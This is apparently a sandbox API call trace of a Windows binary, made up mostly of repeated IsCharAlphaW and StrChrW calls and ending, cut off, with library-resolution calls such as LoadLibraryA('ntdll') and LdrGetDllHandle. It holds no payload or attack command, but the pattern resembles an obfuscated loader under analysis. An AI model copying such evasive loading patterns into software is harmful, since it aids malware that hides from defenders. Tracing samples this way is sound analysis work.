IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.782] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.782] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.783] IsCharAlphaW (ch=0x20) returned 0 [0012.783] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.784] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.784] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.785] IsCharAlphaW (ch=0x20) returned 0 [0012.785] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.786] IsCharAlphaW (ch=0x20) returned 0 [0012.786] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.787] IsCharAlphaW (ch=0x20) returned 0 [0012.787] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.788] IsCharAlphaW (ch=0x20) returned 0 [0012.788] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.789] StrChrW (lpStart="CLEAR", wMatch=0x4c) returned="LEAR" [0012.789] IsCharAlphaW (ch=0x20) returned 0 [0012.905] lstrcmpiW (lpString1="NEST", lpString2="NEST") returned 0 [0012.908] GetTickCount () returned 0xc013 [0012.908] GetSystemDirectoryA (in: lpBuffer=0x40eea4, uSize=0x12c | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0012.908] GetFileInformationByHandle (in: hFile=0x0, lpFileInformation=0x0 | out: lpFileInformation=0x0) returned 0 [0012.908] GlobalAddAtomW (lpString="BASIC") returned 0xc148 [0012.909] SizeofResource (hModule=0x0, hResInfo=0x0) returned 0x0 [0012.909] GetUserDefaultLCID () returned 0x409 [0012.909] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0012.910] LoadLibraryA (lpLibFileName="ntdll") returned 0x77560000 [0012.910] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="kernel32", 